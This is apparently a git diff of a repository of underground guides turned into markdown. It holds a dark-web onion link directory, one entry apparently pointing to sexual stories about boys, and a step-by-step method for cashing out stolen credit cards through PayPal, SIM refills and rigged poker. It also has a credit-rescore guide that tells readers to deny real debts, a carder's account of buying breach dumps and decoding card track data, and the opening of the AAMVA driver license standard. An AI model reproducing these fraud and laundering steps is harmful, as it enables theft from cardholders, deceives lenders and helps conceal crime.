(NordVPN+Tor Browser). +NordVPN 2 + +http://xfmro77i3lixucja.onion/ – Books – Imperial Library of Trantor is the biggest place for books; here you can find all major categories books, and if you want to find any specific category ebook, then you can easily filter by the help of tag system which you can see on the homepage. This Deep Web sites has more than 101640 Books in digital format and library size still growing day to day, hope here you can find your required books. Some available popular category which mostly people like here Fiction, Science, Mystery, Action & Adventure, Horror, Suspense, Thriller, Paranormal, General, Crime, Thrillers and so on. + +http://bookssutzsay4so3.onion/cat/ – Books – Mobi Library: Still looking book deep web sites alternative then here is another one, which also offers big amount books library. This site has more than 10000+ books, which you filter according to works or starting character. + +http://wis45idjhhbgemez.onion/ – Books – Calibre Library: This dark web links also offer books library, if you are still searching book for reading then hope this site can help you. + +http://3cvpkfx4gdnkcduj.onion – Books – Non English: Do you want to download some ebook from deep web links. I have one dark web links which offer big ebook database, database size is 159.457 GB, here you can search ebook by the help of text, suppose you are looking ebooks related to sex then put your text into search box then result will be front of you. + +http://3cpleimu2getp5q7.onion/ – Books – Strategic Intelligence Network: I love this site because here you alco can find big amount of all type books related to tech, weapons, security, engineering and much more, and website is browsable just like as directory(FTP) structure. For Directory library access, you can try http://3cpleimu2getp5q7.onion/library/ link. + +https://www.cs.tau.ac.il/~tromer/ecdh/ – Books/Study/journals – ECDH Key-Extraction via Low-Bandwidth Electromagnetic Attacks on PCs: This site offer research paper about Low-Bandwidth Electromagnetic Attacks on PCs, If you want to get lot more about this technique then you can visit this deep web sites. + +http://ibgk7stvp6bov6x6.onion/ – Books – Anonlib is a sites related to most religious books like The Koran, The Bible, Panchatantra and lot of others. If you want to access these books into hidden internet, then you can visit this site. + +http://castorz2lijmrc5f.onion/ – Books/Study/journals – Biblioteca Castor: This is the big books library. I love this library because one the website screen you can see some ebook pictures, and all books which are shown on display all are very popular. This site also offers multilingual ebooks, here you find some other language books like Russian, Dutch, English and etc. + +http://dembtxtlnu2cospb.onion/index.html – Books/Adult/Stories – Dark & Extream Boy Stories: Do you like Adult stories and finding some great Tor onion links then this deep web sites can provide you great amount of adult stories, here you can choose stories according to authors. Hope you will enjoy these stories. + +http://h2am5w5ufhvdifrs.onion/ – Books/Study/journals – Cryptome: Do you want to get information about some true gernals related to government agencies, check out this hidden internet site, here you also can download these generals and can read locally into your computer. + +http://v3bpt2x7iuz3gr2n.onion/ – Books – Humen Iteration: This deep web sites offer some experts document, if you are looking some research document and want to know more about these documents then you can try this deep web links. + +This deep web links list is not like other deep web links list. I have checked every the hidden wiki url frist before adding into the list of deep web links. All hidden wiki onion link are working. + +Keep visiting to get more info about deep web dark web, dark web links, deep web sites, the hidden wiki url, deep web websites, tor hidden wiki, dark web wiki, tor dark web, links de la deep web, tor directory, hidden wiki link 2016, links onion sites, sites da deep web, etc. diff --git a/2VPNS_txt.md b/2VPNS_txt.md new file mode 100644 index 0000000..7deee5b --- /dev/null +++ b/2VPNS_txt.md @@ -0,0 +1,9 @@ +# 2VPNS + + +--- + +VPN Gate: +https://mega.nz/#!wlp3nQDT!t5ujPcC7g9MompVNAVCEtq_7azvIJyGs98RgiG7m-XI +BETTERNETVPN +https://www.betternet.co/ diff --git a/3 Ways_To_Cash_Out bitcoin_pdf.md b/3 Ways_To_Cash_Out bitcoin_pdf.md new file mode 100644 index 0000000..8cd0572 --- /dev/null +++ b/3 Ways_To_Cash_Out bitcoin_pdf.md @@ -0,0 +1,45 @@ +# 3 Ways To Cash Out bitcoin + + +--- + +Way N.1: PayPal +what you need: +IBAN/ANON Card ± you can buy one cheap from: Tobacco2012 +1:Set up a real PP account using your real anon. It is easy to do but if you don't know +how you can ask Tobacco2012 to sell you a guide within his real anon CC. +2: Wait for validation +3: Get an anonymous SIM card +4: Register yourself to liqpay +5: From PP account create a donation button +6: Using stolen CC's deposit some money using the donation button. (my advice is not +much from each card, around £20/30 per card is good) +7: Now buy bitcoins using the PP card by liqpay +8: Transfer your money to your BTC address ;) +This way is tested and 100% working. +Way N.2: Sim Card +what you need: +A bunch of SIM cards +1: Check if your SIM card is refillable online. If so then go on. +2: Now fill your SIM cards using CC's. Its better to do different refills of low amounts. +3: Now subscribe a wallet on blockchain.info (use tor!!) +4: Now make an instant deposit by telephone: +1: select country. +2: select big amount. +3: select payphone way. +4: call and wait. +Good! You now have your BTC in your wallet, you can easily transfer to your address and spend +them. I tried this using a Polish SIM card. This way has high fees but has highest success rate. +Way N.3: Poker +To do this you need an initial investment of 2BTC. +1: Go to https://www.switchpoker.com/en and register an a REAL account for you. +2: Refill that account using 2 BTC. +3: When asked use REAL information of yourself. +4: Now register a second FAKE account using CC information (use tor!) +5: Refill fake account with CC information. +6: Now, using tor and you normal browser, play the 2 accounts against each other and +win on real account. +7: Do some real play to avoid suspicion on real account. +8: After couple of days withdraw your winnings. +9: You have 50% chance of being asked for ID when you withdraw, send it without +problem as you won this money legally ;) diff --git a/7 Days Rapid Rescore Strategy_2016_pdf.md b/7 Days Rapid Rescore Strategy_2016_pdf.md new file mode 100644 index 0000000..3d2e6c0 --- /dev/null +++ b/7 Days Rapid Rescore Strategy_2016_pdf.md @@ -0,0 +1,65 @@ +# 7 Days Rapid Rescore Strategy 2016 + + +--- + +DELETE ALL NEGATIVE ITEMS IN 7 DAYS +The picture above is of the Credit Assure credit simulator that shows you precisely the amount +your credit score will rise after completing a RAPID RESCORE. But more about this in a minute. +Let's get started! +W H A T I S A RA P I D R E S C O R E ? +A rapid rescore is the ability to provide documentation or request documentation to the 3 credit +bureaus to get them to update your information quickly. Many of these scores can be updated in as +little as 72 HOURS! +Yes that's right 3 days!!!! +But how does someone do this? How can I update my score that quickly? How can I challenge +the 3 credit bureaus to verify my negative accounts that quickly? +Well I'm glad you asked.... + +L O C A L I N D E P E N D E N T M O R G A G E L O A N O F F I C E R S +Contact local independent mortgage loan officers. NOT A BANK. You are looking for a few +people who run their own 2-3 person, small shops. You are looking for a loan officer who knows about +rapid rescore and will do a rapid rescore for you. +You will need to explain you are looking to purchase a home in the near future. Who know you +might actually want to purchase a home and need a loan, but that is not important right this second. +Your point is to get the loan officer to pull your credit and do a rapid rescore. +Ask this potential loan officer if his credit pulling agency offers a rapid rescore. Most everyone +does rapid rescore these days and most have the Credit Assure credit simulator (Picture Above). +Explain to them you will require a few rapid rescores in advance to increase your credit scores +to get the best rate on a loan because of some old delinquent accounts and old errors. MAKE SURE +THEY WILL HELP YOU WITH A RAPID RESCORE. +Give the loan officer your vital information: Name, Phone #, Address, Social Security Number, +Date of Birth, etc so he can pull your credit report. This credit report is actually pretty cool. Mortgage +credit reports are special and show the FULL ACCOUNT NUMBERS and all data in the 3 Credit +Bureaus. This is known as your Tri-Merge Credit Report. Cool huh? Check it out below... + +C R E D I T S I M U L A T O R +Study your credit simulator thoroughly and decide what items will increase your score the most +quickly. Use this above 7 day rapid rescore system for the really big ones and the Section 609 letters +for the next biggest. Once you know what negative items you will remove or that you have paid and +are just sitting there request the loan officer (or you can do it yourself) to get the collection agency or +creditor to fax or mail you a letter on their letterhead proving the account does not exist, is paid, or +should be deleted BECAUSE THEY CAN'T VERIFY IT WITH PROOF THE DEBT IS YOURS. +They can't prove the debt is yours – these mistakes on your credit report are what are holding +you back from getting a home loan and explain to loan officer that these negative accounts are +“ERRORS”. He will be able to walk you through what to do next. +When the loan officer calls the collection company or creditor they ask to verify the account +number. Then they ask to verify the account status. The status can be an error, paid, or deleted. We +always push for deleted. Never admit the negative account is yours. Either it is an error and must be +deleted or it's paid in full and should come off. +S A M P L E L E T T E R H E A D +Here is a sample letterhead you would get proving status of canceled, deleted or paid accounts + +Once the negative item is verified as paid in full, not yours, or reported as an error, the update to +your credit report is almost instant. +N O T E S +Using a mortgage loan officer in this way may not be very ethical however if you are planning +to buy a home this a smart way to do it and you can use the loan officer. He or she will get that +commission if you do decide to buy a home in the future and use that loan officer. If you are not +planning to purchase a home you can PAY the loan officer for the rapid rescore. +You can also pay http:// www.rapidrescorecredit.com +They should charge you $100 per account. They might try to sell you their credit repair +program. Just try to get Rapid Rescore Only. +With the dispute letters and the ability to rapid rescore you have enormous power to fix your credit and +your life. +I wish you the best! diff --git a/A Carder_s First Experience_pdf.md b/A Carder_s First Experience_pdf.md new file mode 100644 index 0000000..b9a50d1 --- /dev/null +++ b/A Carder_s First Experience_pdf.md @@ -0,0 +1,87 @@ +# A Carder s First Experience + + +--- + +We do not support carding! This is for educational purposes only – and reflect the author’s +own experience and views only. +At the time of this story, I was new to carding. Saying that I was “new” is a bit of an +understatement. I had never used any Darknet markets, and I had barely any experience +with Bitcoin. I had a lot to learn. This was my experience. +There are currently few major carding forums such as – Tor Carding Forums (TCF) and +Rescator for example. Since Tor Carding Forums had a fee for registration, I decided to use +Rescator. The website requires an account to access any listings or to make purchases, but +it does not require any payment for registration. +There are two things that are unique about Rescator: first, it is centralized. As the rumor +goes, Rescator was a reputable user from a now-defunct Russian forum. After this forum +was infiltrated by law enforcement, he decided to open his own dedicated shop. Many of the +recent security breaches, including Target and J.P. Morgan, can be traced back to a small +group of people who include Rescator. Second, there is no escrow system. Once you +release funds, there is very little you can dispute. The site’s only dispute resolution is in the +form of tickets. I had to put a lot of trust in a single person. +There is also some terminology that is pretty exclusively used on carding forums. “Dumps” +are the collections of data that are being sold. These are exactly what they sound like – +disorganized dumps of all data that was collected. A “base” is a collection of dumps that +were all skimmed from the same source. The data from the Target hack would be a base, +while the data from the Home Depot hack would be another base. The names of these +bases vary, ranging from names like, “Ronald Reagan” to “Beaver Cage”. The amount of +data that you can expect to still be usable and valid is called the “validity rate”. +In order to purchase a dump, I had to transfer money into an on-site account. This is where +Bitcoin came into the picture. I decided not to tumble my Bitcoins. Many people advocate +that you must tumble your Bitcoins. The issue, however, is that tumbling Bitcoins does not +make them impossible to trace – it just makes them difficult to trace. This is what we call, +“security through obscurity”. +I decided that, to be safe, I had to make my Bitcoins impossible to trace. Here was my plan: +All Bitcoin transactions are publicly recorded on the blockchain. As long as you are trading +on the blockchain, all transactions are connected. Therefore, I had to break the chain of +transactions. To do this, I used a normal Bitcoin exchange. +I converted my Bitcoin to Litecoin, then back into Bitcoin. + +The act of purchasing was fairly straightforward. The website itself was very user-friendly. +There was a basic filter that could be used to sort by base, country of origin, type of card, +among other criteria. When I decided on the card information I wanted to purchase, I added +it to my cart. At this point, in order to release funds and receive the dump, I simply clicked a +“purchase” button. +From the time a base is released, the validity rate will gradually decrease. After a security +breach is discovered, companies and account holders begin to close accounts, and the data +quickly becomes useless. Therefore, I chose a recent base: American Sanctions, +information collected during the recent Home Depot breach. + +This is what I got once I received my order. This, at first, was a bit confusing. +Here’s how card technology works: There are two to three tracks on the magnetic strip of a +credit or debit card. Track 3 is sometimes not even present on cards, and most major +networks only use tracks 1 and 2. +This is the format for Track 1: account number^Lastname/Firstname^expiration +date(YY/MM)::bank key(3 numbers)::discretionary data or security key(in this case it was a +CVC code – 3 numbers)::Longitudinal Redundancy Check. +This is the format for Track 2: +account number=expiration date(YY/MM)::service code(3 numbers)::discretionary data or +security key (3 numbers)::Longitudinal Redundancy Check +A lot of the information from Track 1 is repeated on Track 2. +Now we can make my example meaningful: +Lets divide Track 1: +4631588xxxxx//,.//1601//101//163//03100495000000 +Our primary account number is: 4631588xxxxx +Our account holder is: +Our Expiration date is: 01/16 +Our service code is: 101 +Our CVC code is: 163 +Once I had organized this information, it became a matter of cashing out the card. +The difficulty of actually using this information is figuring out how to use it anonymously. I +decided that once again, I would turn to Bitcoin. There are several things a website asks +you for when you use a debit or credit card: the primary account number, the expiration +date, and the security (CVC) code. +Since all of this was included in the dump, I could use the card online without any problems. +I decided to purchase gift cards, which I would then sell for Bitcoins. After doing my Bitcoin +> Litecoin > Bitcoin tumbling scheme mentioned earlier, I could deposit these into my wallet. +However, I never got that far. My plan would have been successful…had the card holder’s +account not been closed. + +Overall, my experience was very positive. At first, I was just happy that I hadn’t gotten scammed; +and after banging my head over my desk a few times, I ended up not being too upset over the +card’s failure. After all, if I had purchased a card with an option for a refund, I would have been +successful. Using the information, while an extensive process, was definitely doable. It worked very +much like any market, with many helpful and honest members.. The people involved were not just +criminals looking for easy money; they were interested in the technology and were more than +willing to help me. The carding community was just as diverse as any community, and I discovered it +was just as tight knit. diff --git a/AAMVA National Standard for the Driver License Identification Card-2000_pdf.md b/AAMVA National Standard for the Driver License Identification Card-2000_pdf.md new file mode 100644 index 0000000..1f53326 --- /dev/null +++ b/AAMVA National Standard for the Driver License Identification Card-2000_pdf.md @@ -0,0 +1,3275 @@ +# AAMVA National Standard for the Driver License Identification Card-2000 + + +--- + +AAMVA +2000-06-30 +AAMVA National Standard for the +Driver License/Identification Card +AAMVA DL/ID-2000 +American Association of +Motor Vehicle +Administrators + +This document was produced by AAMVAnet, Inc. AAMVAnet is a division of the American +Association of Motor Vehicle Administrators (AAMVA). +No part of this document may be reproduced or transmitted in any form or by any means, +electronic or mechanical, including photocopying, recording, or information storage or retrieval +systems, for any purpose other than the intended use by AAMVAnet, Inc., without the express +written permission of AAMVAnet, Inc. +© 2000 AAMVA/AAMVAnet. All rights reserved. + +Contents +1 Scope...............................................................................................................................................1 +2 Conformance...................................................................................................................................1 +3 Normative reference(s)...................................................................................................................1 +4 Term(s) and definition(s)................................................................................................................3 +5 Physical characteristics and card technologies...........................................................................5 +5.1 Physical characteristics..................................................................................................................5 +5.2 Card technologies...........................................................................................................................5 +5.3 Durability of card structure............................................................................................................5 +6 Data elements..................................................................................................................................5 +6.1 Description of table headings........................................................................................................5 +6.1.1 Reference Number..........................................................................................................................5 +6.1.2 Data element/label...........................................................................................................................6 +6.1.3 Usage...............................................................................................................................................6 +6.1.4 Definition.........................................................................................................................................6 +6.1.5 Field length and type......................................................................................................................6 +6.1.6 Address requirement......................................................................................................................6 +6.2 Required data elements..................................................................................................................7 +Table 1 — Required data elements.....................................................................................................................7 +6.3 Optional data elements...................................................................................................................8 +Table 2 — Optional data elements......................................................................................................................8 +6.4 Format conventions......................................................................................................................11 +6.4.1 Character set.................................................................................................................................11 +6.4.2 Format of dates.............................................................................................................................11 +7 Physical security...........................................................................................................................12 +7.1 Definitions.....................................................................................................................................12 +7.1.1 Covert............................................................................................................................................12 +i + +7.1.2 Overt..............................................................................................................................................12 +7.1.3 First line inspection......................................................................................................................12 +7.1.4 Second line inspection.................................................................................................................12 +7.1.5 Third line inspection.....................................................................................................................12 +7.2 Physical security requirement......................................................................................................12 +8 Encryption.....................................................................................................................................12 +Table 3 — Minimum Non-encrypted data elements.........................................................................................13 +Annex A (normative) Mapping of driver license/identification card info to magnetic stripe cards............15 +Introduction.......................................................................................................................................................15 +A.1 Conformance.................................................................................................................................15 +A.2 Card characteristics......................................................................................................................15 +A.3 Coded character set......................................................................................................................15 +Table A.1 — Coded character set for 5 bit numeric.........................................................................................15 +Table A.2 — Coded character set for 7 bit alphanumeric................................................................................16 +A. 4 Information content and format...................................................................................................16 +A.4.1 Track 1...........................................................................................................................................17 +Table A.3 — Track 1 information content and format......................................................................................17 +A.4.2 Track 2...........................................................................................................................................18 +Table A.4 — Track 2 information content and format......................................................................................18 +A.4.3 Track 3...........................................................................................................................................19 +Table A.5 — Track 3 information content and format......................................................................................19 +A.5 Encoding specifications...............................................................................................................20 +A.6 Error detection..............................................................................................................................20 +Annex B (normative) Mapping driver license/identification card info to integrated circuit(s) cards (ICC) 21 +Introduction.......................................................................................................................................................21 +B.2 Physical characteristics................................................................................................................22 +B.3 Location and dimensions of coupling areas...............................................................................22 +B.4 Electronic signals.........................................................................................................................22 +B.5 Transmission protocols and answer to reset..............................................................................22 +ii + +B.5.1. Transmission protocols...............................................................................................................22 +B.5.2. Answer to reset.............................................................................................................................22 +B.6 Application selection....................................................................................................................22 +B.7 File structure.................................................................................................................................22 +B.8 Command set................................................................................................................................23 +B.9 File contents..................................................................................................................................24 +B.9.1. EF (Issuer Information) SFI ‘01’.............................................................................................24 +ISSUER +B.9.2. EF (Driver License data) SFI ‘02’................................................................................................25 +DL +B.9.2.1 Record 1 – mandatory data elements..........................................................................................26 +B.9.2.2 Record 2 – personal characteristics............................................................................................27 +B.9.2.3 Record 3 – permit data elements, residence address and mailing address..............................28 +B.9.2.4 Record 4 – “AKA” data elements.................................................................................................29 +B.9.3 EF (Magnetic Stripe Information) SFI ‘03’................................................................................29 +MAG +B.9.4 EF (Digitized Portrait Image) SFI ‘04’.......................................................................................30 +POR +B.9.5 EF (Digitized Handwritten Signature Image) SFI ‘05’...............................................................30 +SIG +B.10 Security.........................................................................................................................................31 +B.11 Data element tags.........................................................................................................................32 +Annex C (normative) Finger imaging.............................................................................................................35 +Introduction.......................................................................................................................................................35 +C.1 Conformance.................................................................................................................................35 +C.2 Application Definitions.................................................................................................................35 +C.2.1 Verification....................................................................................................................................35 +C.2.2 Search............................................................................................................................................35 +C.2.3 Core...............................................................................................................................................35 +C.3 Finger Selection............................................................................................................................35 +Figure C.1 — Finger Selection..........................................................................................................................36 +C.4 Image Quality................................................................................................................................36 +C.4.1 Finger Image Collection Device...................................................................................................36 +C.4.2 Finger Image Collection Result....................................................................................................36 +iii + +C.5 Compression.................................................................................................................................36 +C.6 Data Format...................................................................................................................................37 +C.7 Minutiae Extraction Introduction.................................................................................................37 +C.8 External Standards Referenced...................................................................................................37 +C.9 Definitions.....................................................................................................................................37 +C.10 Minutiae Description....................................................................................................................38 +C.10.1 Principle........................................................................................................................................38 +C.10.2 Minutia Type..................................................................................................................................38 +C.10.3 Minutia Location...........................................................................................................................38 +C.10.3.1 Coordinate System.......................................................................................................................38 +C.10.3.2 Minutia Placement on a Ridge Ending........................................................................................38 +C.10.3.3 Minutia Placement on a Ridge Bifurcation..................................................................................39 +C.10.3.4 Minutia Placement on Other Minutiae Types..............................................................................39 +C.10.4 Minutia Direction..........................................................................................................................39 +C.10.4.1 Angle Conventions.......................................................................................................................39 +C.10.4.2 Angle of a Ridge Ending..............................................................................................................39 +C.10.4.3 Angle of a Ridge Bifurcation........................................................................................................39 +Figure C.2 - Minutia Location............................................................................................................................40 +C.11 Finger Minutiae Record Format...................................................................................................41 +C.11.1 Record Header..............................................................................................................................41 +C.11.1.1 Format Identifier...........................................................................................................................41 +C.11.1.2 Version Number............................................................................................................................41 +C.11.1.3 Length of Record..........................................................................................................................41 +C.11.1.4 System Vendor ID.........................................................................................................................42 +C.11.1.5 Feature Extraction Software ID....................................................................................................42 +C.11.1.6 Scanner ID.....................................................................................................................................42 +C.11.1.7 Size of Scanned Image in X direction..........................................................................................42 +C.11.1.8 Size of Scanned Image in Y direction..........................................................................................42 +C.11.1.9 Scan Rate in X direction...............................................................................................................42 +C.11.1.10 Scan Rate in Y direction...............................................................................................................42 +iv + +C.11.1.11 Number Of Fingers.......................................................................................................................42 +C.11.1.12 Reserved Byte...............................................................................................................................42 +C.11.2 Single Finger Record Format.......................................................................................................42 +C.11.2.1 Finger Header...............................................................................................................................42 +C.11.2.1.1 Finger Position.............................................................................................................................43 +Table C.1 - Finger Position codes...................................................................................................................43 +C.11.2.1.2 Impression Type...........................................................................................................................43 +Table C.2 - Impression Type codes................................................................................................................43 +C.11.2.1.3 Finger Quality...............................................................................................................................44 +C.11.2.1.4 Number of Minutiae......................................................................................................................44 +C.11.2.2 Finger Minutiae Data....................................................................................................................44 +C.11.2.2.1 Minutiae Type................................................................................................................................44 +C.11.2.2.2 Minutiae Position..........................................................................................................................44 +C.11.2.2.3 Minutiae Angle..............................................................................................................................44 +C.11.2.2.4 Minutiae Quality............................................................................................................................44 +C.11.3 Proprietary Data............................................................................................................................44 +C.11.3.1 Type Identification Code...............................................................................................................44 +C.11.3.2 Length of Data...............................................................................................................................45 +C.11.3.3 Private Data....................................................................................................................................45 +Table C.3 - Minutia Record Format Summary..................................................................................................46 +C.12 Record Format Diagrams..............................................................................................................47 +C.12.1 Overall Record Format..................................................................................................................47 +C.12.2 Record Header...............................................................................................................................47 +C.12.3 Single Finger Minutia Record.......................................................................................................47 +C.12.4 Finger Minutiae Data.....................................................................................................................48 +C.12.5 Private (Proprietary) Data..............................................................................................................48 +C.13 Interoperable Matcher Performance (Informative).......................................................................49 +Figure C.3 - Interoperability Concept...............................................................................................................49 +C.14 Compliance (Informative)..............................................................................................................50 +C.14.1 Record format compliance............................................................................................................50 +v + +C.14.2 Finger Minutiae Extraction............................................................................................................50 +C.15 Example MInutiae Record (Informative)......................................................................................51 +C.15.1 Data...............................................................................................................................................51 +C.15.2 Example Data Format Diagrams..................................................................................................52 +C.15.3 Raw Data for the Resulting Minutiae Record..............................................................................53 +Annex D (normative) Mapping of driver license/identification card info to optical memory cards............55 +Introduction.......................................................................................................................................................55 +D.1 Conformance.................................................................................................................................55 +D.2 File location...................................................................................................................................55 +D.3 Updating of data...........................................................................................................................55 +Annex E (normative) Mapping driver license/identification card info to 2 dimensional bar codes............57 +Introduction.......................................................................................................................................................57 +E.1 Conformance.................................................................................................................................57 +E.2 Symbology....................................................................................................................................57 +E.3 Card Characteristics.....................................................................................................................57 +E.3.1 Symbology Characteristics..........................................................................................................57 +E.3.2 Dimensions and Print Quality......................................................................................................57 +E.3.2.1 Narrow element dimension..........................................................................................................57 +E.3.2.2 Row height....................................................................................................................................58 +E.3.2.3 Quiet zone.....................................................................................................................................58 +E.3.2.4 Print Quality..................................................................................................................................58 +E.3.2.5 Sampling.......................................................................................................................................58 +E.3.2.6 Symbol Durability.........................................................................................................................58 +E.3.3 Bar code area................................................................................................................................58 +E.3.4 Orientation and Placement...........................................................................................................58 +E.3.4.1 PDF417 Orientation.......................................................................................................................58 +E.3.4.2 Designing the Card Layout...........................................................................................................59 +Figure E.1 — Orientation of PDF417 symbol on bottom.................................................................................59 +E.4 Information contents and formats...............................................................................................59 +vi + +E.4.1 Data Structure...............................................................................................................................59 +E.4.2 Header...........................................................................................................................................59 +Table E.1 — 2D symbols header format...........................................................................................................59 +E.4.3 Subfile Designator........................................................................................................................61 +E.4.4 Elements........................................................................................................................................61 +E.4.4.1 Required........................................................................................................................................61 +E.4.4.2 Optional.........................................................................................................................................61 +E.4.5 Example of 2D Symbol.................................................................................................................62 +E.5 Error Detection and Correction....................................................................................................65 +E.6 Character Sets...............................................................................................................................65 +E.7 Compression.................................................................................................................................65 +Annex F (normative) Driver license/identification card compression for digital imaging..........................67 +Introduction.......................................................................................................................................................67 +F.1 Conformance.................................................................................................................................67 +F.2 Definitions.....................................................................................................................................67 +F.3 Information Contents and Formats..............................................................................................70 +F.3.1 Requirements for Photographs and Signatures.........................................................................70 +F.3.1.1 Color Photo Images......................................................................................................................70 +F.3.1.1.1 Image Data Formats.....................................................................................................................70 +F.3.1.1.2 Image Compression Standard.....................................................................................................70 +F.3.1.1.3 Associated JPEG Parameters.....................................................................................................70 +F.3.1.1.3.1 Interchange Format......................................................................................................................70 +Table F.1 — Recommended File Interchange Format......................................................................................70 +Table F.2 — Recommended file interchange format........................................................................................71 +F.3.1.1.3.2 Color Space Translation..............................................................................................................72 +Table F.3 — Required for color images............................................................................................................72 +F.3.1.1.4 Options to Optimize Performance..............................................................................................72 +F.3.1.1.4.1 Sub sampling...............................................................................................................................72 +F.3.1.1.4.2 Interleaving...................................................................................................................................73 +vii + +F.3.1.1.4.3 Table Signaling............................................................................................................................73 +F.3.1.2 Signatures....................................................................................................................................73 +F.3.1.2.1 Image Data Formats....................................................................................................................73 +F.3.1.2.2 Image Compression Methods....................................................................................................73 +Table F.4 — Requirements for signatures gray scale......................................................................................74 +Table F.5 — Requirements for Signatures Binary...........................................................................................74 +F.3.1.3 Associated JPEG Parameters......................................................................................................75 +F.3.1.3.1 Interchange Format......................................................................................................................75 +F.3.1.4 Options to Optimize Performance..............................................................................................75 +F.3.1.4.1 Table Signaling.............................................................................................................................75 +F.4 Signature Compressed Vector Format........................................................................................75 +Figure F.1 Signature format..........................................................................................................................75 +F.4.1 File Header Format........................................................................................................................76 +F.4.1.1 Horizontal Resolution...................................................................................................................76 +F.4.1.2 Vertical Resolution.......................................................................................................................76 +F.4.1.3 Number of Vectors........................................................................................................................76 +F.4.2 Vector Data Format.......................................................................................................................76 +F.4.2.1 Small Offset...................................................................................................................................76 +F.4.2.2 Large Offset...................................................................................................................................76 +F.4.2.3 Pen Lift..........................................................................................................................................77 +Figure F.2 Signature data stream..................................................................................................................77 +F.5 Digital Images...............................................................................................................................77 +F.5.1 Category A - Facial Portrait Image (Capture)...............................................................................77 +F.5.1.1 Pose...............................................................................................................................................77 +F.5.1.2 Depth of Field................................................................................................................................77 +F.5.1.3 Centering.......................................................................................................................................78 +Figure F.3 Centering facial image.................................................................................................................78 +F.5.1.4 Lighting.........................................................................................................................................78 +F.5.1.5 Background...................................................................................................................................78 +F.5.1.6 Aspect Ratio..................................................................................................................................78 +viii + +F.5.1.7 Color Space...................................................................................................................................79 +F.5.1.8 Compression Algorithm...............................................................................................................79 +F.5.1.9 File Format....................................................................................................................................79 +F.5.2 Category A - Facial Portrait Image (Document).........................................................................79 +F.5.2.1 Aspect Ratio..................................................................................................................................79 +F.5.2.2 Facial Portrait Image Dimensions................................................................................................79 +F.5.2.3 Borders..........................................................................................................................................79 +F.5.3 Category B - Signature Images (Capture)....................................................................................79 +F.5.3.1 Digitization....................................................................................................................................79 +F.5.3.2 Compression and Storage............................................................................................................80 +F.5.3.3 File Format....................................................................................................................................80 +F.5.4 Category B - Signature Images (Document)................................................................................80 +F.5.4.1 Aspect Ratio..................................................................................................................................80 +F.5.4.2 Signature Image Dimensions.......................................................................................................80 +F.5.4.3 Borders..........................................................................................................................................80 +F.5.5 Category C - Finger Images (Capture).........................................................................................80 +F.5.5.1 Standards......................................................................................................................................80 +F.5.6 Category C - Finger Images (Document).....................................................................................81 +F.5.7 Category D - Ghosted Images (Capture)......................................................................................81 +F.5.8 Category D - Ghosted Images (Document)..................................................................................81 +Annex G (normative) Test Methods................................................................................................................83 +Introduction (informative).................................................................................................................................83 +G.1 Scope...........................................................................................................................................83 +G.2 Conformance...............................................................................................................................83 +G.3 Normative references..................................................................................................................83 +G.4 Terms and definitions.................................................................................................................84 +G.4.1 card service life..........................................................................................................................84 +G.5 Test methods and sample size...................................................................................................84 +G.6 Test report...................................................................................................................................86 +ix + +Annex H (informative) Physical security features for the driver license/identification card..........................87 +Introduction.......................................................................................................................................................87 +H.1 Features........................................................................................................................................87 +x + +Foreword +(This foreword is not part of the AAMVA National Standard for the Driver License). +The purpose of the Driver License Card standard is to provide a uniform means to identify (a) issuers and (b) holders +of Driver License cards within the United States. +The standard specifies minimum requirements for the presentation of identification information in human-readable +form, and it specifies the format and data content of identification in the following technologies: magnetic stripe, bar +code, integrated circuit cards, optical memory, and digital imaging. +It is important to note that inclusion of any technology is optional; however, when a technology is used, it must comply +fully with the standard. +The scope of the standard is to specify identification information for Driver License applications. It does not standardize +recording of driving related convictions or the withdrawal of driving privileges; however, in the high-capacity +technologies, the standard employs international standard application coding such that additional applications may be +possible on the same card. +This standard is a U.S. Driver License application of existing international identification card standards that relate to +physical characteristics, layout, data access and storage techniques, physical security requirements, and to +registration procedures for identification of card issuers. +Work on this standard began in 1997 and is a result of cooperation between ANSI NCITS B10, the American +Association of Motor Vehicle Administrators (AAMVA) and their Industry Advisory Board. The development involved +broad-based project teams including state driver license agencies, government, equipment and software suppliers, +card vendors, and consultants. +This standard meets the following objectives: +¾ uniquely identifies the card issuer and cardholder; +¾ brings uniformity to the millions of Driver License cards now in circulation; +¾ encourages transition from existing practice to the new standard; +¾ assists administrative efficiency and accuracy through machine-readable identification within a foundation that +encourages future applications; +¾ facilitates future development in technology and application. +Requests for interpretation, suggestions for improvement or addenda, or defect reports are welcome. Please send +these to the Standards Program Director, AAMVAnet, 4301 Wilson Boulevard – Suite 400, Arlington, VA 22203 +(www.aamva.org). +xi + +Driver License Cards - Identification Cards +1 Scope +This AAMVA National Standard specifies directly or by reference the requirements for cards used in driver license +applications. It takes into consideration both human and machine aspects and states the minimum requirements for +conformity. It contains physical characteristics, layout, data access techniques, data storage techniques, registration +procedures, and security requirements. Security measures are defined as minimum requirements but card issuers are +free to have more stringent security features. +2 Conformance +An identification card is in conformance with this standard if it meets all mandatory requirements specified directly or +by reference herein. +3 Normative reference(s) +The following normative documents contain provisions, which, through reference in this text, constitute provisions of +this AAMVA National Standard. For dated references, subsequent amendments to, or revisions of, any of these +publications do not apply. However, parties to agreements based on this AAMVA National Standard are encouraged to +investigate the possibility of applying the most recent editions of the normative documents indicated below. For +undated references, the latest edition of the normative document referred to applies. Members of ANSI, ISO and IEC +maintain registers of currently valid National and International Standards. +ANSI-D20: 1998, Data Element Dictionary for Traffic Records Systems +ANSI/ASQC Z1.4: Military Standard, Sampling Procedures and Tables for Inspection by Attributes +ANSI/NIST-CSL1-1993, “Data Format for the Interchange of Fingerprint Information” +ANSI X3.182 Bar-Code Print Quality +ASCII/ISO 8859-1: “Information Processing - 8bit single byte coded graphic character sets - Part 1: Latin alphabet No. +1” 1998 +BioAPI Specification Version 1.00 : March 30, 2000 - The BioAPI Consortium +CJIS/FBI IAFIS-IC-0110 Wavelet Scalar Quantization (WSQ) +CJIS-RS-0010 Appendix G “Interim IAFIS Image Quality Specifications for Scanners” +ISO/IEC 646: 1991, Information technology - ISO 7-bit coded character set for information interchange +ISO/IEC 7810: 1995, Identification cards - Physical characteristics +ISO/IEC 7811-6: 1996, Identification cards - Recording technique - Part 6: High coercivity magnetic stripe +1 + +ISO 7816-1: 1987, Identification cards - Integrated circuit(s) cards with contacts - Part 1: Physical characteristics +ISO 7816-2: 1988, Identification cards - Integrated circuit(s) cards with contacts - Part 2: Dimensions and location of +contacts +ISO/IEC 7816-3: 1997, Identification cards - Integrated circuit(s) cards with contacts - Part 3: Electronic signals and +transmission protocols +ISO/IEC 7816-4: 1995, Identification cards - Integrated circuit(s) cards with contacts - 